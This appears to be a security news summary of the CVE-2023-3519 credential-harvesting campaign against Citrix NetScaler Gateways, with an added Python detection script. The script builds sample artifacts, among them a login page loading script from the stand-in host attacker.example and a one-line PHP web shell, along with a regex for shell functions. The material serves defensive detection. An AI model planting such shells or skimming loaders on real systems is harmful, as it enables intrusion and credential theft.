Hackers have been exploiting a critical vulnerability [2] [4], tracked as CVE-2023-3519 [1] [3] [4] [5], in unpatched Citrix NetScaler ADC and NetScaler Gateway appliances [2]. The flaw allows unauthenticated remote code execution on the appliance and has been used in a large-scale campaign to steal the credentials of users signing in through the Gateway.

Description

By mid-August [4], at least 2,000 Citrix servers had been backdoored using this exploit [4]. In the credential-harvesting campaign, the attackers use the vulnerability to drop a PHP web shell on the appliance and then append custom HTML to the legitimate ‘index.html’ of the VPN login page [6]. The injected markup makes the authentication page load a JavaScript file hosted on attacker-controlled infrastructure [6]; that script hooks the login form and sends the submitted credentials back to the same attacker-controlled URL in an HTTP POST request, so the page still looks and behaves normally to the user. IBM X-Force has identified almost 600 unique victim IP addresses worldwide, primarily in the U.S. [1] [3] and Europe [1] [3], hosting modified NetScaler Gateway login pages [1] [6]. NetScaler Packet Processing Engine (NSPPE) crash files may contain evidence of the initial exploitation [6].
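The campaign leaves two artifacts on disk that an administrator can check for offline: a script tag in the login page that pulls JavaScript from a host outside the appliance, and a PHP file with command-execution primitives under the web root. The following Python is an added example, not code from the cited reports, from Citrix, or from CISA; it scans a constructed sample directory laid out like the NetScaler GUI tree (the real login page lives at /netscaler/ns_gui/vpn/index.html), flags external script sources and web-shell-like PHP, and lists files modified after an assumed last-install time, the same idea as `find -newermt`. The allow-list of script hosts and the sample file names are assumptions made for the demonstration.

```python
"""Added example (not from the cited articles, Citrix or CISA): offline checks
for the two artifacts described above on a NetScaler Gateway web root.
The directory tree built by build_sample_tree() is constructed for the demo."""
import re
import tempfile
import time
from html.parser import HTMLParser
from pathlib import Path
from urllib.parse import urlparse

# Assumption: the genuine login page loads scripts only by relative path, so any
# <script src> that resolves to a hostname is suspect. Adjust for your build.
ALLOWED_SCRIPT_HOSTS = {""}


class _ScriptSrcCollector(HTMLParser):
    """Collects every <script src=...> value found in the page."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def external_script_srcs(html):
    """Script sources whose host is outside ALLOWED_SCRIPT_HOSTS.
    Protocol-relative URLs ("//host/x.js") parse to a hostname and are caught too."""
    collector = _ScriptSrcCollector()
    collector.feed(html)
    return [s for s in collector.srcs
            if (urlparse(s).hostname or "") not in ALLOWED_SCRIPT_HOSTS]


# Heuristic: a PHP open tag followed by a code-execution primitive.
PHP_SHELL = re.compile(
    rb"<\?(?:php|=)[\s\S]*?\b(?:system|exec|shell_exec|passthru|popen|proc_open|eval)\s*\(")


def suspicious_php_files(root):
    """Relative paths of files under root that match the web-shell heuristic."""
    root = Path(root)
    return sorted(str(p.relative_to(root)) for p in root.rglob("*")
                  if p.is_file() and PHP_SHELL.search(p.read_bytes()))


def files_modified_after(root, cutoff_epoch):
    """Relative paths of files whose mtime is later than cutoff_epoch, e.g. the
    timestamp of the last firmware install (compare: find ROOT -newermt DATE)."""
    root = Path(root)
    return sorted(str(p.relative_to(root)) for p in root.rglob("*")
                  if p.is_file() and p.stat().st_mtime > cutoff_epoch)


def scan(root, last_install_epoch):
    """Run all three checks against a web root and return the findings."""
    index_html = Path(root) / "netscaler" / "ns_gui" / "vpn" / "index.html"
    return {
        "external_scripts": external_script_srcs(index_html.read_text()),
        "php_shells": suspicious_php_files(root),
        "modified_after_install": files_modified_after(root, last_install_epoch),
    }


def build_sample_tree():
    """Constructed sample tree: an untouched legitimate script, a login page with
    an injected external loader, and a dropped PHP file. Returns (root, cutoff)."""
    root = Path(tempfile.mkdtemp())
    vpn = root / "netscaler" / "ns_gui" / "vpn"
    (vpn / "js").mkdir(parents=True)
    cutoff = time.time() - 86400  # pretend the last install was a day ago

    legit_js = vpn / "js" / "gateway_login_view.js"
    legit_js.write_text("// legitimate gateway script (constructed)\n")
    import os
    os.utime(legit_js, (cutoff - 3600, cutoff - 3600))  # older than the install

    (vpn / "index.html").write_text(
        '<html><body>\n'
        '<script src="/vpn/js/gateway_login_view.js"></script>\n'
        '<form id="login"><input name="login"><input name="passwd"></form>\n'
        '<script src="https://attacker.example/login.js"></script>\n'  # injected
        '</body></html>\n')
    (vpn / "prod.php").write_text(  # constructed web shell stand-in
        '<?php echo shell_exec($_REQUEST["cmd"]); ?>\n')
    return root, cutoff


if __name__ == "__main__":
    sample_root, last_install = build_sample_tree()
    for key, value in scan(sample_root, last_install).items():
        print(f"{key}: {value}")
```

On a real appliance the same three checks would be run against `/netscaler/ns_gui` with the cutoff set to the last time a firmware build was installed; a hit on the external-script check is the strongest single indicator of this campaign, while the mtime and PHP checks catch the web shell that made the page modification possible.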

Despite repeated warnings to update Citrix devices [4], many appliances remain unpatched [4], and hackers have been using CVE-2023-3519 to inject credential-harvesting JavaScript since September [4]. Organizations are advised to apply Citrix's patches promptly and to change the default login credentials on their devices. Patching closes the entry point but does not remove a web shell or a modified ‘index.html’ that is already in place, so any appliance that was exposed while unpatched should be treated as potentially compromised until it has been checked. The Cybersecurity and Infrastructure Security Agency (CISA) has published an advisory with recommendations for detection, incident response [6], mitigations [6], and testing of security procedures [6], which organizations should follow. Patch management tools such as Patch Manager Plus can be used to roll out the fix quickly across a fleet.

The campaign has affected almost 600 unique IP addresses of NetScaler devices and has not been attributed to any known threat actor or group. Administrators should patch immediately and check for signs of a breach [2]: a modified login page, unexpected PHP files under the web root, files newer than the last install, and NSPPE crash files. Organizations should also implement strong security controls [2], such as multi-factor authentication and privileged access security [2], to limit what an attacker can do with harvested credentials [2].

Conclusion

The exploitation of CVE-2023-3519 in unpatched Citrix NetScaler Gateways has had significant impact, with thousands of servers backdoored and user credentials stolen through modified login pages. Prompt patching and changing default login credentials are the first mitigations, and a patched appliance still needs to be checked for artifacts left by earlier exploitation. CISA's advisory provides guidance for organizations to improve their detection, incident response [6], and security procedures [6]. Strong security controls [2], such as multi-factor authentication and privileged access security [2], reduce the value of harvested credentials to an attacker [2]. Administrators should remain vigilant and continuously monitor for signs of a breach.

References

[1] https://beker.uk/2023/10/10/citrix-devices-under-attack-netscaler-flaw-exploited-to-capture-user-credentials/
[2] https://www.scmagazine.com/news/attacks-on-netscaler-gateways-aim-for-user-credentials
[3] https://thehackernews.com/2023/10/citrix-devices-under-attack-netscaler.html
[4] https://www.redpacketsecurity.com/hackers-hijack-citrix-netscaler-login-pages-to-steal-credentials/
[5] https://www.cyberevive.com/2023/10/10/citrix-devices-under-attack-netscaler-flaw-exploited-to-capture-user-credentials/
[6] https://cybersecuritynews.com/hackers-exploiting-citrix-netscaler-vulnerability/